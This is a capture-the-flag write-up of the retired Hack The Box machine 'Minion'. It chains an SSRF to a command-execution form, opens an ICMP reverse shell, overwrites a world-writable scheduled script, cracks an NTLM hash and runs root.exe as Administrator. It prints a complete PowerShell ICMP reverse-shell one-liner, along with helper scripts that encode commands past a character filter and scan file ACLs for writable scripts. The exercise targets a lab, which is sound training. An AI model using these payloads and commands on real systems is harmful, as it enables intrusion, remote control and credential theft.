Today we are going to solve another CTF challenge, "Minion", which is available online for those who want to sharpen their penetration-testing and black-box testing skills. Minion is a retired vulnerable lab from Hack The Box, which offers a collection of vulnerable machines as challenges ranging from beginner to expert level so that you can practise according to your experience.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are hosted online they have static IPs; the IP of Minion is 10.10.10.57, so let's begin with a full nmap port scan.
root@kali:~/htb/minion# nmap -sV -p- 10.10.10.57
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-31 15:44 CET
Nmap scan report for 10.10.10.57
Host is up (0.027s latency).
Not shown: 65534 filtered ports
PORT      STATE SERVICE VERSION
62696/tcp open  http    Microsoft IIS httpd 8.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 842.77 seconds
The web page on port 62696 shows nothing useful, so we run dirb to enumerate directories. Since the target is running Microsoft IIS, we look specifically for .asp files.
root@kali:~/htb/minion# dirb http://10.10.10.57:62696 -X .asp

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jan 31 16:10:15 2019
URL_BASE: http://10.10.10.57:62696/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.asp) | (.asp) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.57:62696/ ----
+ http://10.10.10.57:62696/test.asp (CODE:200|SIZE:41)

-----------------
END_TIME: Thu Jan 31 16:12:29 2019
DOWNLOADED: 4612 - FOUND: 1
Playing with test.asp shows that it is vulnerable to SSRF: it fetches whatever URL we give it and returns the content. When we point it at localhost we find a link called "system commands".
Because we are not browsing the internal page directly, we read the returned source code to find the link to the system commands page.
We open that page through the SSRF and find a form that can be used to execute commands.
Submitting a command through the form does not work, so we look at the page source and find the parameter that carries the command we type.
Passing our command in that parameter, the only feedback we get is an exit status: Exit Status = 1 when the command ran successfully and Exit Status = 0 on error. There is no command output.
Attempts to get a TCP or UDP reverse shell fail, so outbound TCP and UDP are probably blocked by the firewall. We use the RCE to ping our own host and check whether ICMP is allowed.
Hmmmm… The method is POST and the parameter is named "xcmd". Nevertheless, let's run an experiment: use the GET method and pass the xcmd parameter via the URL, with xcmd = ping 10.10.14.15:
On our side, let's see whether we capture any pings coming from MINION (10.10.10.57):
Getting a shell
It's time to get a shell. On our side we can run icmpsh_m.py from https://github.com/inquisb/icmpsh and on MINION we can send this payload: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1
The problem is that when we send this payload via the xcmd parameter some symbols are filtered ("+", "&", "/") and there is also a size limit. We can double URL-encode the special symbols to pass them through the filter. We could also use multiple "echo >>" commands to write a .ps1 script file piece by piece, and indeed many people followed that path. But Alamot wrote his very compact one-liner payload without using any "+" or "&" symbols:
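As an added example (not code from the original writeup), the encoding trick and the exit-status check can be scripted so that every command goes out the same way. The port, /test.asp and the xcmd parameter are taken from the page; the SSRF parameter name `u`, the internal command page path `/cmd.aspx` and the 200-character size limit are placeholders and must be replaced with what you observe on the target.

```python
# Added example, not from the writeup: build the GET request that carries an
# xcmd command through the SSRF hop, double URL-encoding the filtered symbols.
# Known from the page: port 62696, /test.asp, the "xcmd" parameter, the
# "Exit Status = N" feedback. Hypothetical: SSRF parameter "u", internal page
# path /cmd.aspx, and the 200-character size limit.
import re
from urllib.parse import parse_qs, quote, urlsplit

TARGET = "http://10.10.10.57:62696/test.asp"      # from the page
SSRF_PARAM = "u"                                 # hypothetical parameter name
INTERNAL_CMD_PAGE = "http://localhost/cmd.aspx"  # hypothetical internal path
CMD_PARAM = "xcmd"                               # from the page
FILTERED = "+&/"                                 # symbols the page says are filtered
MAX_CMD_LEN = 200                                # assumed; the page only says a limit exists


def filtered_chars(command):
    """List the filtered symbols present in a command (these are the ones that need the double encoding)."""
    return sorted(c for c in set(command) if c in FILTERED)


def build_request_url(command):
    """Return the outer GET URL for one command.

    The command is percent-encoded once to sit in the internal URL's query string,
    and that whole internal URL is percent-encoded again to sit in the outer query
    string. Every byte of the command therefore travels double-encoded on the wire
    ("&" becomes "%2526"), which is what lets the filtered symbols through.
    """
    if len(command) > MAX_CMD_LEN:
        raise ValueError("command too long: %d > %d" % (len(command), MAX_CMD_LEN))
    inner = "%s?%s=%s" % (INTERNAL_CMD_PAGE, CMD_PARAM, quote(command, safe=""))
    return "%s?%s=%s" % (TARGET, SSRF_PARAM, quote(inner, safe=""))


def command_seen_by_internal_page(url):
    """Simulate the two decoding hops: IIS decodes the outer query once when test.asp
    reads its parameter, test.asp fetches that URL, and the command page decodes
    its own query once more. The result is the original command."""
    outer = parse_qs(urlsplit(url).query)
    inner_url = outer[SSRF_PARAM][0]          # first decode happened here
    inner = parse_qs(urlsplit(inner_url).query)
    return inner[CMD_PARAM][0]                 # second decode happened here


EXIT_STATUS_RE = re.compile(r"Exit Status\s*=\s*(\d+)")


def parse_exit_status(body):
    """Pull the exit status out of the response; the writeup saw 1 = success, 0 = error."""
    m = EXIT_STATUS_RE.search(body)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    cmd = "ping 10.10.14.15"
    print(build_request_url(cmd))
    # Constructed response body shaped like the only feedback the page gives us.
    print(parse_exit_status("<html><body>Exit Status = 1</body></html>"))
```

Run `command_seen_by_internal_page` on what `build_request_url` produces before sending anything: if the round trip does not give back your original command, the encoding layers are wrong and the target will report Exit Status = 0 for reasons that have nothing to do with the command itself.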
$ip = 'LHOST'; $id = 'UNIQUEID'; $ic = New-Object System.Net.NetworkInformation.Ping; $po = New-Object System.Net.NetworkInformation.PingOptions; $po.DontFragment=$true; function s($b) { $ic.Send($ip,5000,([text.encoding]::ASCII).GetBytes($b),$po) }; function p { -join($id,'[P$] ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ') }; while ($true) { $r = s(p); if (!$r.Buffer) { continue; }; $rs = ([text.encoding]::ASCII).GetString($r.Buffer); if ($rs.Substring(0,8) -ne $id) { exit }; try { $rt = (iex -Command $rs.Substring(8) | Out-String); } catch { $rt = ($_.Exception|out-string) }; $i=0; while ($i -lt $rt.length-110) { s(-join($id,$rt.Substring($i,110))); $i -= -110; }; s(-join($id,$rt.Substring($i))); }
You can see he used some tricks, such as $i -= -110 instead of $i += 110, to keep the "+" character out of the payload. The script also carries a unique id in every packet, because with ICMP things get messy when several payloads are running at the same time and all their echo requests arrive at the same listener. You can download his script from here: https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Minion/icmp_alamot.py
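To make the framing in the one-liner concrete, here is a pure-Python model of it, added here as an example; it is not code from the writeup or from Alamot's script, and it uses no raw sockets. It assumes exactly what the one-liner does: an 8-character id, 110-character chunks, the master answering with "<id><command>" in the echo-reply buffer, and the "[P$] user@host folder> " prompt.

```python
# Added example, not from the writeup: a model of the ICMP shell framing used by
# the PowerShell one-liner, showing why the id matters and how the 110-byte
# chunks are produced and reassembled. Assumed to match the one-liner: ID_LEN=8,
# CHUNK=110, prompt tag "[P$] ", reply buffer = id + command.

ID_LEN = 8
CHUNK = 110
PROMPT_TAG = "[P$] "


def build_prompt(uid, user, host, cwd_name):
    """The one-liner's p function: id, prompt tag, user@host, current folder name, '> '."""
    return "".join([uid, PROMPT_TAG, user, "@", host, " ", cwd_name, "> "])


def implant_chunks(uid, output):
    """Split command output exactly as the one-liner's while loop does: CHUNK-sized
    pieces while more than CHUNK characters remain, then whatever is left (may be empty)."""
    frames = []
    i = 0
    while i < len(output) - CHUNK:
        frames.append(uid + output[i:i + CHUNK])
        i += CHUNK           # the one-liner writes this as $i -= -110 to avoid a literal "+"
    frames.append(uid + output[i:])
    return frames


def implant_accepts(uid, reply_buffer):
    """The implant's guard: if the first 8 bytes of the reply are not our id, it exits.
    PowerShell's Substring(0,8) throws on a shorter buffer, so a short reply is rejected too."""
    return len(reply_buffer) >= ID_LEN and reply_buffer[:ID_LEN] == uid


def is_prompt(uid, frame):
    """A frame starting with id + '[P$] ' is the implant asking for its next command."""
    return frame.startswith(uid + PROMPT_TAG)


def master_reassemble(uid, frames):
    """Master side: keep only frames tagged with our id, strip the id, join the rest.
    Frames from another implant talking to the same listener are dropped, not mixed in."""
    return "".join(f[ID_LEN:] for f in frames if f[:ID_LEN] == uid)


def simulate_exchange(uid, command, run):
    """One round trip: prompt from the implant, command in the master's reply, output back.
    `run` stands in for iex on the target and returns the command's output string."""
    wire = [build_prompt(uid, "iis apppool\\defaultapppool", "MINION", "inetsrv")]
    reply = uid + command                       # what the master puts in the echo reply
    if not implant_accepts(uid, reply):
        return None                             # the implant would exit here
    wire.extend(implant_chunks(uid, run(command)))
    return master_reassemble(uid, wire[1:])     # everything after the prompt is output


# Constructed stand-in for command results on the target.
FAKE_RESULTS = {"whoami": "iis apppool\\defaultapppool\r\n", "dir": "x" * 250}


if __name__ == "__main__":
    print(simulate_exchange("84444eaf", "whoami", lambda c: FAKE_RESULTS.get(c, "")))
    print(len(implant_chunks("84444eaf", FAKE_RESULTS["dir"])), "frames for 250 bytes of output")
```

The chunk loop is worth tracing once: 250 bytes of output produce frames of 110, 110 and 30 bytes, and 110 bytes produce a single frame, because the loop condition is `i < length - 110`, not `i < length`. The tail frame is always sent, even when it is empty, which is how the master knows the output is complete.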
Now, let’s get a shell (don’t forget to change LHOST inside the script):
root@kali:~/htb# python icmp_alamot.py
Sending powershell ICMP payload [UID=84444eaf] and waiting for shell...
[P$] iis apppool\defaultapppool@MINION inetsrv> dir c:\

    Directory: C:\

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         9/4/2017   7:42 PM            accesslogs
d----        8/10/2017  10:43 AM            inetpub
d----        8/22/2013   8:52 AM            PerfLogs
d-r--        9/25/2017   1:51 AM            Program Files
d----        8/10/2017   9:42 AM            Program Files (x86)
d----        8/24/2017   1:28 AM            sysadmscripts
d----        9/16/2017   2:41 AM            temp
d-r--         9/4/2017   7:41 PM            Users
d----        9/10/2017  10:20 AM            Windows

[P$] iis apppool\defaultapppool@MINION inetsrv>
The folder sysadmscripts looks interesting:
Inside it we find two files, "c.ps1" and "del_logs.bat".
Looking at their content, c.ps1 writes something into a file whose path is passed as its argument, and del_logs.bat writes to log.txt inside c:\windows\temp\. The timestamp on log.txt changes every 5 minutes, so something is running these scripts on a schedule.
Let's examine the permissions in the sysadmscripts folder:
[P$] iis apppool\defaultapppool@MINION sysadmscripts> ls | get-acl | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\c.ps1
Owner  : BUILTIN\Administrators
Group  : MINION\None
Access : Everyone Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  FullControl
Audit  :
Sddl   : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;FA;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;BU)

Path   : Microsoft.PowerShell.Core\FileSystem::C:\sysadmscripts\del_logs.bat
Owner  : BUILTIN\Administrators
Group  : MINION\None
Access : Everyone Allow  ReadAndExecute, Synchronize
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
Audit  :
Sddl   : O:BAG:S-1-5-21-2506507270-770315343-2455145413-513D:PAI(A;;0x1200a9;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)
The scheduled task that runs c.ps1 every 5 minutes runs as the user decoder, and Everyone has FullControl on c.ps1, so our app-pool identity can overwrite it. del_logs.bat, by contrast, is only ReadAndExecute for Everyone and BUILTIN\Users.
So we replace the original c.ps1 with our own script, so that the next scheduled run fetches user.txt and root.txt for us:
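Reading the Sddl lines by eye works for two files, but on a real engagement you want to check every script a scheduled task touches. The following is an added example, not part of the writeup: a small SDDL DACL parser that flags files whose ACEs let a low-privilege principal modify them. The two SDDL strings are the ones shown above; the SID abbreviations, rights abbreviations and access-mask bits are the standard SDDL/Win32 values, and the LOW_PRIV set is an assumption about which groups an IIS app-pool identity ends up in.

```python
# Added example, not from the writeup: parse the DACL part of an SDDL string and
# report low-privilege principals that can modify the file. SID abbreviations,
# rights abbreviations and mask bits are standard SDDL / Win32 values; the
# LOW_PRIV set is an assumption about an IIS app-pool identity's group membership.
import re

SID_NAMES = {
    "WD": "Everyone",
    "BU": "BUILTIN\\Users",
    "BA": "BUILTIN\\Administrators",
    "SY": "NT AUTHORITY\\SYSTEM",
    "AU": "NT AUTHORITY\\Authenticated Users",
    "IU": "NT AUTHORITY\\INTERACTIVE",
}
LOW_PRIV = {"WD", "BU", "AU", "IU"}   # assumed: groups a low-privilege token carries

# SDDL rights abbreviations -> access mask (file-system values).
RIGHTS = {
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
}
# Mask bits that allow changing the file's content, deleting it, or rewriting its ACL.
WRITE_BITS = {
    0x2: "FILE_WRITE_DATA", 0x4: "FILE_APPEND_DATA", 0x10: "FILE_WRITE_EA",
    0x100: "FILE_WRITE_ATTRIBUTES", 0x10000: "DELETE", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x40000000: "GENERIC_WRITE", 0x10000000: "GENERIC_ALL",
}
ACE_RE = re.compile(r"\(([^)]*)\)")

# The two SDDL strings from the Get-Acl output above.
C_PS1_SDDL = ("O:BAG:S-1-5-21-2506507270-770315343-2455145413-513"
              "D:PAI(A;;FA;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;BU)")
DEL_LOGS_SDDL = ("O:BAG:S-1-5-21-2506507270-770315343-2455145413-513"
                 "D:PAI(A;;0x1200a9;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)")


def parse_mask(rights):
    """Turn an ACE rights field ("FA", "0x1200a9", "FRFX") into an integer access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):      # concatenated two-letter abbreviations
        mask |= RIGHTS[rights[i:i + 2]]
    return mask


def parse_dacl(sddl):
    """Return the DACL's ACEs as dicts: type ('A' allow / 'D' deny), flags, mask, sid."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # stop at the SACL if one follows
    aces = []
    for body in ACE_RE.findall(dacl):
        ace_type, flags, rights, _obj, _inherit, sid = body.split(";")[:6]
        aces.append({"type": ace_type, "flags": flags, "mask": parse_mask(rights), "sid": sid})
    return aces


def effective_allow(aces, sid):
    """Allowed bits for one SID after subtracting deny ACEs for that same SID.
    Group membership of a concrete user is not resolved here; that needs the user's token."""
    allowed = denied = 0
    for ace in aces:
        if ace["sid"] != sid:
            continue
        if ace["type"] == "A":
            allowed |= ace["mask"]
        elif ace["type"] == "D":
            denied |= ace["mask"]
    return allowed & ~denied


def low_priv_writers(sddl):
    """List (principal name, [write rights]) for low-privilege SIDs that can modify the file,
    in the order the SIDs first appear in the DACL."""
    aces = parse_dacl(sddl)
    order = []
    for ace in aces:
        if ace["sid"] in LOW_PRIV and ace["sid"] not in order:
            order.append(ace["sid"])
    hits = []
    for sid in order:
        mask = effective_allow(aces, sid)
        names = [name for bit, name in sorted(WRITE_BITS.items()) if mask & bit]
        if names:
            hits.append((SID_NAMES.get(sid, sid), names))
    return hits


if __name__ == "__main__":
    for label, sddl in (("c.ps1", C_PS1_SDDL), ("del_logs.bat", DEL_LOGS_SDDL)):
        print(label, "->", low_priv_writers(sddl) or "not writable by low-privilege principals")
```

The 0x1200a9 mask on del_logs.bat decodes to read, read-attributes, read-EA, execute, READ_CONTROL and SYNCHRONIZE, which is what Get-Acl prints as "ReadAndExecute, Synchronize"; none of the write bits are set, so only c.ps1 is reported. On the target you would feed this function the Sddl line of every file referenced by a scheduled task or service rather than just the two in this folder.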
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\administrator\Desktop > c:\temp\output.txt" > c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "dir c:\users\decoder.MINION\Desktop >> c:\temp\output.txt" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\administrator\Desktop\root.txt c:\temp\root.txt" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> echo "copy c:\users\decoder.MINION\Desktop\* c:\temp\" >> c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> (Get-Content c:\temp\test.ps1) | ForEach-Object { $_ -replace """", "" } | Set-Content c:\temp\test.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\sysadmscripts\c.ps1 c:\temp\c.ps1.bak
[P$] iis apppool\defaultapppool@MINION sysadmscripts> copy c:\temp\test.ps1 c:\sysadmscripts\c.ps1
[P$] iis apppool\defaultapppool@MINION sysadmscripts> cd c:\temp
[P$] iis apppool\defaultapppool@MINION temp> dir

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         9/4/2017   7:19 PM     103297 backup.zip
-a---        9/26/2017   6:24 AM        284 c.ps1.bak
-a---        1/31/2019   6:01 AM        770 output.txt
-a---        1/31/2019   5:59 AM        228 test.ps1
-a---        8/25/2017  11:09 AM         33 user.txt

[P$] iis apppool\defaultapppool@MINION temp> type user.txt
40b******601
[P$] iis apppool\defaultapppool@MINION temp> get-content c:\temp\backup.zip -str pass
28a5d1e0c15af9f8fce7db65d75bbf17
Here -str is PowerShell's abbreviation of -Stream: the hash is not inside the archive but in an NTFS alternate data stream named "pass" attached to backup.zip. We crack the NTLM hash with hashkiller.co.uk and get the password 1234test, which turns out to be the local Administrator's password:
[P$] iis apppool\defaultapppool@MINION temp> net use * \\minion\c$ /user:minion\administrator 1234test
Drive Z: is now connected to \\minion\c$.

The command completed successfully.
[P$] iis apppool\defaultapppool@MINION temp> z:
[P$] iis apppool\defaultapppool@MINION Z:\> dir

    Directory: Z:\

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         9/4/2017   7:42 PM            accesslogs
d----        8/10/2017  10:43 AM            inetpub
d----        8/22/2013   8:52 AM            PerfLogs
d-r--        9/25/2017   1:51 AM            Program Files
d----        8/10/2017   9:42 AM            Program Files (x86)
d----        8/24/2017   1:28 AM            sysadmscripts
d----        1/31/2019   6:01 AM            temp
d-r--         9/4/2017   7:41 PM            Users
d----        9/10/2017  10:20 AM            Windows

[P$] iis apppool\defaultapppool@MINION Z:\> cd users
[P$] iis apppool\defaultapppool@MINION users> cd administrator
[P$] iis apppool\defaultapppool@MINION administrator> cd desktop
[P$] iis apppool\defaultapppool@MINION desktop> dir

    Directory: Z:\users\administrator\desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        9/26/2017   6:18 AM     386479 root.exe
-a---        8/24/2017  12:32 AM         76 root.txt

[P$] iis apppool\defaultapppool@MINION desktop> type root.txt
In order to get the flag you have to launch root.exe located in this folder!
Going back a step: after replacing c.ps1 we waited a few minutes for the scheduled task to run our script, and user.txt then appeared in c:\temp. root.txt did not, as the dir listing of c:\temp shows, so the task does not run with enough privilege to read the Administrator's Desktop. Before looking at backup.zip we checked output.txt, which confirmed that user.txt lives in c:\users\decoder.MINION\Desktop.
Instead of an online service, the hash can also be cracked locally with hashcat; mode 1000 is plain NTLM, not the NetNTLM variants:
c:\PENTEST\HASHCAT>hashcat32 -h | findstr NTLM
   5500 | NetNTLMv1                                        | Network Protocols
   5500 | NetNTLMv1+ESS                                    | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols
   1000 | NTLM                                             | Operating Systems

c:\PENTEST\HASHCAT>hashcat32 -a0 -m 1000 28a5d1e0c15af9f8fce7db65d75bbf17 e:\oscp\rockyou.txt --force --show
28a5d1e0c15af9f8fce7db65d75bbf17:1234test
We try to run root.exe over the mapped drive but do not get the flag, because we are still running as the app-pool identity, not as Administrator. With the cracked password we build a PSCredential and run root.exe as Administrator through Invoke-Command on localhost:
[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw
[P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {cd C:\Users\Administrator\Desktop\;C:\Users\Administrator\Desktop\root.exe}
25a*****cf1
Adding a firewall rule (as Administrator), so that traffic from our host 10.10.14.15 is no longer blocked by the Windows firewall:
[P$] iis apppool\defaultapppool@MINION desktop> $user = '.\administrator';$psw = '1234test';$secpsw= ConvertTo-SecureString $psw -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $user, $secpsw
[P$] iis apppool\defaultapppool@MINION desktop> invoke-command -computername localhost -credential $credential -scriptblock {New-NetFirewallRule -DisplayName puckie -RemoteAddress 10.10.14.15 -Direction inbound -Action Allow}
Author: Puckiestyle